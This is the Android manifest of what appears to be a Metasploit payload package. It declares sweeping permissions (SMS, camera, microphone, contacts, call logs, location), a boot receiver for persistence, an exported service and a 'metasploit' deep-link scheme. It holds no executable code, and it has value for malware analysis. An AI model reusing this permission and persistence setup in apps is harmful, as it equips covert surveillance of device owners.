<?xml version="1.0" encoding="utf-8"?>
<manifest
	xmlns:android="http://schemas.android.com/apk/res/android"
	android:versionCode="1"
	android:versionName="1.0"
	package="com.metasploit.stage"
	platformBuildVersionCode="10"
	platformBuildVersionName="2.3.3"
	>
	<uses-sdk
		android:minSdkVersion="8"
		android:targetSdkVersion="17"
		>
	</uses-sdk>
	<uses-permission
		android:name="android.permission.INTERNET"
		>
	</uses-permission>
	<uses-permission
		android:name="android.permission.ACCESS_WIFI_STATE"
		>
	</uses-permission>
	<uses-permission
		android:name="android.permission.CHANGE_WIFI_STATE"
		>
	</uses-permission>
	<uses-permission
		android:name="android.permission.ACCESS_NETWORK_STATE"
		>
	</uses-permission>
	<uses-permission
		android:name="android.permission.ACCESS_COARSE_LOCATION"
		>
	</uses-permission>
	<uses-permission
		android:name="android.permission.ACCESS_FINE_LOCATION"
		>
	</uses-permission>
	<uses-permission
		android:name="android.permission.READ_PHONE_STATE"
		>
	</uses-permission>
	<uses-permission
		android:name="android.permission.SEND_SMS"
		>
	</uses-permission>
	<uses-permission
		android:name="android.permission.RECEIVE_SMS"
		>
	</uses-permission>
	<uses-permission
		android:name="android.permission.RECORD_AUDIO"
		>
	</uses-permission>
	<uses-permission
		android:name="android.permission.CALL_PHONE"
		>
	</uses-permission>
	<uses-permission
		android:name="android.permission.READ_CONTACTS"
		>
	</uses-permission>
	<uses-permission
		android:name="android.permission.WRITE_CONTACTS"
		>
	</uses-permission>
	<uses-permission
		android:name="android.permission.RECORD_AUDIO"
		>
	</uses-permission>
	<uses-permission
		android:name="android.permission.WRITE_SETTINGS"
		>
	</uses-permission>
	<uses-permission
		android:name="android.permission.CAMERA"
		>
	</uses-permission>
	<uses-permission
		android:name="android.permission.READ_SMS"
		>
	</uses-permission>
	<uses-permission
		android:name="android.permission.WRITE_EXTERNAL_STORAGE"
		>
	</uses-permission>
	<uses-permission
		android:name="android.permission.RECEIVE_BOOT_COMPLETED"
		>
	</uses-permission>
	<uses-permission
		android:name="android.permission.SET_WALLPAPER"
		>
	</uses-permission>
	<uses-permission
		android:name="android.permission.READ_CALL_LOG"
		>
	</uses-permission>
	<uses-permission
		android:name="android.permission.WRITE_CALL_LOG"
		>
	</uses-permission>
	<uses-permission
		android:name="android.permission.WAKE_LOCK"
		>
	</uses-permission>
	<uses-feature
		android:name="android.hardware.camera"
		>
	</uses-feature>
	<uses-feature
		android:name="android.hardware.camera.autofocus"
		>
	</uses-feature>
	<uses-feature
		android:name="android.hardware.microphone"
		>
	</uses-feature>
	<application
		android:label="@7F020000"
		>
		<activity
			android:theme="@01030055"
			android:label="@7F020000"
			android:name=".MainActivity"
			>
			<intent-filter
				>
				<action
					android:name="android.intent.action.MAIN"
					>
				</action>
				<category
					android:name="android.intent.category.LAUNCHER"
					>
				</category>
			</intent-filter>
			<intent-filter
				>
				<data
					android:scheme="metasploit"
					android:host="my_host"
					>
				</data>
				<category
					android:name="android.intent.category.DEFAULT"
					>
				</category>
				<category
					android:name="android.intent.category.BROWSABLE"
					>
				</category>
				<action
					android:name="android.intent.action.VIEW"
					>
				</action>
			</intent-filter>
		</activity>
		<receiver
			android:label="MainBroadcastReceiver"
			android:name=".MainBroadcastReceiver"
			>
			<intent-filter
				>
				<action
					android:name="android.intent.action.BOOT_COMPLETED"
					>
				</action>
			</intent-filter>
		</receiver>
		<service
			android:name=".MainService"
			android:exported="true"
			>
		</service>
	</application>
</manifest>